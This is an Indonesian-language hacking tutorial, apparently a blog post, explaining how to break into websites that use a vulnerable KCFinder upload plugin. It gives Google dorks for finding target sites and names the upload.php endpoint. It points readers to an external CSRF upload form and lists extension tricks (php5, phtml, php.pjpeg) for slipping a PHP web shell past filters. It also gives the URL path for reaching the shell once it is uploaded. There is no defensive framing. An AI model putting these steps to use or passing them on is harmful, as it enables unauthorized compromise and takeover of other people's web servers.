lagi ada waktu luang nih
Langsung aja ya caranya
DORK: inurl:template/theme3/plugins/kcfinder
intitle: index of inurl:assets/plugins/kcfinder
Exploit: kcfinder/upload.php
1. Dorking di google image, lalu kalau vuln ditandai dengan seperti ini
Muncul: Unknown error
2. Lalu kalian upload shell dengan CSRF, comot di http://trolling-system.ooo/csrf.txt
Param input name: Filedata
Upload shell ext: php5, php6, php.pjpeg, phtml, php.accdb dll nya
3. Kalau berhasil di upload seperti ini
4. Akses shell: site.com/[path]/kcfinder/upload/files/shell.php
Kalau kurang mengerti , silahkan chat di fanpage facebook di https://facebook.com/trollyoursystem
Terima kasih sudah berkunjung, jangan lupa share jika kalian suka, jangan lupa juga untuk like dan share fanpage facebook kami yaaaaaaa :D